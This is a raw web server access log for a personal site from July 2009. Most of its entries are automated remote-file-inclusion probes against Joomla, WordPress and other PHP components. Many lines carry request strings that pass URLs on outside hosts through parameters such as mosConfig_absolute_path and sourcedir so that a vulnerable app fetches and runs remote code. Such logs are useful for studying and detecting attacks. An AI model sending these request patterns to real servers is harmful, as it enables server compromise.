67.195.112.110 - - [26/Jul/2009:09:55:13 -0700] "GET /logs/access_090218.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.109.250.50 - - [26/Jul/2009:09:55:16 -0700] "GET /logs/access_090415.log//?_zb_path=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.109.250.50 - - [26/Jul/2009:09:55:36 -0700] "GET /logs/access_081026.log//?_zb_path=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:55:38 -0700] "GET /logs/access_080313.log/index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [26/Jul/2009:09:55:39 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:55:39 -0700] "GET /logs/index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [26/Jul/2009:09:55:40 -0700] "GET //e404.php?DOCUMENT_ROOT=http://bibdigital.epn.edu.ec//m1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [26/Jul/2009:09:55:45 -0700] "GET /logs///e404.php?DOCUMENT_ROOT=http://bibdigital.epn.edu.ec//m1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [26/Jul/2009:09:55:45 -0700] "GET /logs/access_080906.log%20%20///e404.php?DOCUMENT_ROOT=http://bibdigital.epn.edu.ec//m1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [26/Jul/2009:09:55:45 -0700] "GET /logs/access_090330.log%20%20///e404.php?DOCUMENT_ROOT=http://bibdigital.epn.edu.ec//m1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [26/Jul/2009:09:55:52 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [26/Jul/2009:09:55:52 -0700] "GET /logs/access_090217.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [26/Jul/2009:09:55:52 -0700] "GET /logs/access_090521.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [26/Jul/2009:09:55:52 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.127.51.174 - - [26/Jul/2009:09:55:53 -0700] "GET /index.php?sourcedir=http://www.suiteinn.it/news/images/idxx.txt??? HTTP/1.1" 200 21009 "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [26/Jul/2009:09:56:19 -0700] "GET /logs/access_080114.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.171.225.234 - - [26/Jul/2009:09:56:20 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
213.171.225.234 - - [26/Jul/2009:09:56:20 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.171.225.234 - - [26/Jul/2009:09:56:21 -0700] "GET /logs/access_090106.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:56:31 -0700] "GET /logs/access_071213.log//components/com_calendar.php?absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:56:44 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:56:44 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [26/Jul/2009:09:56:44 -0700] "GET /logs/access_080330.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:56:44 -0700] "GET /logs/access_080924.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:56:45 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:56:45 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:56:45 -0700] "GET /logs/access_080924.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:56:55 -0700] "GET /logs/access_080927.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:56:58 -0700] "GET /logs/access_080927.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [26/Jul/2009:09:56:58 -0700] "GET /logs/access_080318.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:09:56:59 -0700] "GET /logs/access_090718.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:09:56:59 -0700] "GET /logs/access_080410.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:09:57:30 -0700] "GET /logs/access_080412.log///?sourcedir=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [26/Jul/2009:09:57:32 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:09:57:33 -0700] "GET /logs///?sourcedir=http://aboutav.com/id1.txt? HTTP/1.1" 200 110061 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:09:57:40 -0700] "GET /logs/access_090223.log///?sourcedir=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:09:57:50 -0700] "GET //?sourcedir=http://aboutav.com/id1.txt? HTTP/1.1" 200 21106 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:09:58:02 -0700] "GET /logs///?sourcedir=http://aboutav.com/id1.txt? HTTP/1.1" 200 110061 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:09:58:03 -0700] "GET /logs/access_080412.log///?sourcedir=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:09:58:03 -0700] "GET //?sourcedir=http://aboutav.com/id1.txt? HTTP/1.1" 200 21105 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:09:58:11 -0700] "GET /logs/access_090223.log///?sourcedir=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [26/Jul/2009:09:58:41 -0700] "GET /logs/access_080906.log///e404.php?DOCUMENT_ROOT=http://bibdigital.epn.edu.ec//m1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [26/Jul/2009:09:58:41 -0700] "GET /logs/access_090330.log///e404.php?DOCUMENT_ROOT=http://bibdigital.epn.edu.ec//m1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [26/Jul/2009:09:59:12 -0700] "GET /logs/access_080330.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [26/Jul/2009:09:59:12 -0700] "GET /logs/access_080318.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.237.66.229 - - [26/Jul/2009:09:59:18 -0700] "GET /logs/access_080615.log//main.php?sayfa=http://bibdigital.epn.edu.ec//m1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.237.66.229 - - [26/Jul/2009:09:59:18 -0700] "GET /main.php?sayfa=http://bibdigital.epn.edu.ec//m1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.237.66.229 - - [26/Jul/2009:09:59:18 -0700] "GET /logs//main.php?sayfa=http://bibdigital.epn.edu.ec//m1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.237.66.229 - - [26/Jul/2009:09:59:18 -0700] "GET /logs/access_080524.log//main.php?sayfa=http://bibdigital.epn.edu.ec//m1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.175.8.218 - - [26/Jul/2009:09:59:25 -0700] "GET /logs/access_081120.log/////////?cmd&file=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.175.8.218 - - [26/Jul/2009:09:59:25 -0700] "GET ////////?cmd&file=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 21173 "-" "Mozilla/5.0" "www.dmulk.com"
69.175.8.218 - - [26/Jul/2009:09:59:25 -0700] "GET /logs/////////?cmd&file=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 110067 "-" "Mozilla/5.0" "www.dmulk.com"
69.175.8.218 - - [26/Jul/2009:09:59:26 -0700] "GET /logs/access_081120.log/////////?cmd&file=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.175.8.218 - - [26/Jul/2009:09:59:26 -0700] "GET ////////?cmd&file=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 21173 "-" "Mozilla/5.0" "www.dmulk.com"
69.175.8.218 - - [26/Jul/2009:09:59:26 -0700] "GET /logs/////////?cmd&file=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 110067 "-" "Mozilla/5.0" "www.dmulk.com"
69.175.8.218 - - [26/Jul/2009:09:59:26 -0700] "GET /logs/access_081120.log/////////?cmd&file=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.175.8.218 - - [26/Jul/2009:09:59:26 -0700] "GET /logs/////////?cmd&file=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 110067 "-" "Mozilla/5.0" "www.dmulk.com"
69.175.8.218 - - [26/Jul/2009:09:59:26 -0700] "GET ////////?cmd&file=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 21173 "-" "Mozilla/5.0" "www.dmulk.com"
69.175.8.218 - - [26/Jul/2009:09:59:30 -0700] "GET /logs/access_081120.log/////////?cmd&file=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.175.8.218 - - [26/Jul/2009:09:59:30 -0700] "GET ////////?cmd&file=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 21173 "-" "Mozilla/5.0" "www.dmulk.com"
69.175.8.218 - - [26/Jul/2009:09:59:31 -0700] "GET /logs/////////?cmd&file=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 110067 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:09:59:41 -0700] "GET /logs/access_090718.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:09:59:45 -0700] "GET /logs/access_080410.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [26/Jul/2009:09:59:53 -0700] "GET /logs/access_080817.log///e404.php?DOCUMENT_ROOT=http://bibdigital.epn.edu.ec//m1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.104.188.3 - - [26/Jul/2009:10:00:09 -0700] "GET /logs/access_080911.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.104.188.3 - - [26/Jul/2009:10:00:10 -0700] "GET /logs/access_090206.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:10:00:38 -0700] "GET /logs/access_090213.log%20%20//index.php?DOCUMENT_ROOT=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.175.8.218 - - [26/Jul/2009:10:00:42 -0700] "GET /logs/access_081120.log%20%20/////////?cmd&file=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.175.8.218 - - [26/Jul/2009:10:00:56 -0700] "GET /logs/access_081120.log%20%20/////////?cmd&file=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.175.8.218 - - [26/Jul/2009:10:01:09 -0700] "GET /logs/access_081120.log%20%20/////////?cmd&file=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.175.8.218 - - [26/Jul/2009:10:01:43 -0700] "GET /logs/access_081120.log%20%20/////////?cmd&file=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:10:02:24 -0700] "GET /logs/access_080719.log%20%20//index.php?DOCUMENT_ROOT=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:10:02:24 -0700] "GET /logs/access_090213.log%20%20//index.php?DOCUMENT_ROOT=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.249.68.203 - - [26/Jul/2009:10:02:41 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/thumbs/thumbs_010-2.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
125.241.54.8 - - [26/Jul/2009:10:02:57 -0700] "GET /logs/access_080521.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:10:03:01 -0700] "GET /logs/access_080516.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:10:03:42 -0700] "GET /logs//s_loadenv.inc.php///?_[DOCUMENT_ROOT]=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:10:03:45 -0700] "GET /logs/access_081107.log//s_loadenv.inc.php///?_[DOCUMENT_ROOT]=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:10:03:45 -0700] "GET /s_loadenv.inc.php///?_[DOCUMENT_ROOT]=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.249.68.203 - - [26/Jul/2009:10:03:52 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/011-3.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
218.38.243.71 - - [26/Jul/2009:10:04:05 -0700] "GET /logs/access_081107.log//s_loadenv.inc.php///?_[DOCUMENT_ROOT]=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:10:04:05 -0700] "GET /logs//s_loadenv.inc.php///?_[DOCUMENT_ROOT]=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [26/Jul/2009:10:04:05 -0700] "GET /s_loadenv.inc.php///?_[DOCUMENT_ROOT]=http://aboutav.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:10:04:22 -0700] "GET /logs/access_080516.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.237.66.229 - - [26/Jul/2009:10:04:30 -0700] "GET /logs/access_081104.log%20%20//main.php?sayfa=http://bibdigital.epn.edu.ec//m1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.237.66.229 - - [26/Jul/2009:10:04:31 -0700] "GET /logs/access_080615.log%20%20//main.php?sayfa=http://bibdigital.epn.edu.ec//m1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.1.246.153 - - [26/Jul/2009:10:05:37 -0700] "GET /logs/access_080222.log/login.php?dir=http://www.seeyou.co.jp/images/stories/idkampret.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.1.246.153 - - [26/Jul/2009:10:05:37 -0700] "GET /login.php?dir=http://www.seeyou.co.jp/images/stories/idkampret.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.1.246.153 - - [26/Jul/2009:10:05:37 -0700] "GET /logs/login.php?dir=http://www.seeyou.co.jp/images/stories/idkampret.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.14 - - [26/Jul/2009:10:06:03 -0700] "GET /logs/wp-admin/includes/plugin.php?ABSPATH=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.14 - - [26/Jul/2009:10:06:03 -0700] "GET /wp-admin/includes/plugin.php?ABSPATH=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.14 - - [26/Jul/2009:10:06:03 -0700] "GET /logs/access_080812.log/wp-admin/includes/plugin.php?ABSPATH=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.13.208.131 - - [26/Jul/2009:10:06:56 -0700] "GET /wp-admin/includes/plugin.php?ABSPATH=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.13.208.131 - - [26/Jul/2009:10:06:56 -0700] "GET /logs/wp-admin/includes/plugin.php?ABSPATH=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.13.208.131 - - [26/Jul/2009:10:06:56 -0700] "GET /logs/access_080812.log/wp-admin/includes/plugin.php?ABSPATH=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.1.246.153 - - [26/Jul/2009:10:06:56 -0700] "GET /logs/access_090408.log/login.php?dir=http://www.seeyou.co.jp/images/stories/idkampret.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.104.188.3 - - [26/Jul/2009:10:07:19 -0700] "GET /logs/access_080307.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.104.188.3 - - [26/Jul/2009:10:07:19 -0700] "GET /logs/access_090201.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.14 - - [26/Jul/2009:10:07:39 -0700] "GET /logs/access_080812.log%20%20/wp-admin/includes/plugin.php?ABSPATH=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [26/Jul/2009:10:07:51 -0700] "GET /logs/access_080313.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:10:08:07 -0700] "GET /logs/access_071213.log//components/com_calendar.php?absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.58.230 - - [26/Jul/2009:10:08:45 -0700] "GET /logs/access_080207.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.58.230 - - [26/Jul/2009:10:08:45 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 110062 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [26/Jul/2009:10:08:48 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
72.32.58.230 - - [26/Jul/2009:10:08:49 -0700] "GET /logs/access_080506.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [26/Jul/2009:10:08:49 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.2; http://dmulk.com/blog" "dmulk.com"
69.13.208.131 - - [26/Jul/2009:10:08:49 -0700] "GET /logs/access_080812.log%20%20/wp-admin/includes/plugin.php?ABSPATH=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.58.230 - - [26/Jul/2009:10:08:54 -0700] "GET /logs/access_080207.log////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.58.230 - - [26/Jul/2009:10:08:54 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 110062 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [26/Jul/2009:10:08:54 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
67.228.191.194 - - [26/Jul/2009:10:08:54 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 110062 "-" "Mozilla/5.0" "www.dmulk.com"
67.228.191.194 - - [26/Jul/2009:10:08:54 -0700] "GET /logs/access_080207.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [26/Jul/2009:10:08:55 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
67.228.191.194 - - [26/Jul/2009:10:08:59 -0700] "GET /logs/access_080506.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.13 - - [26/Jul/2009:10:09:00 -0700] "GET /logs/access_080207.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.13 - - [26/Jul/2009:10:09:01 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 110062 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.8 - - [26/Jul/2009:10:09:01 -0700] "GET /logs/access_080207.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
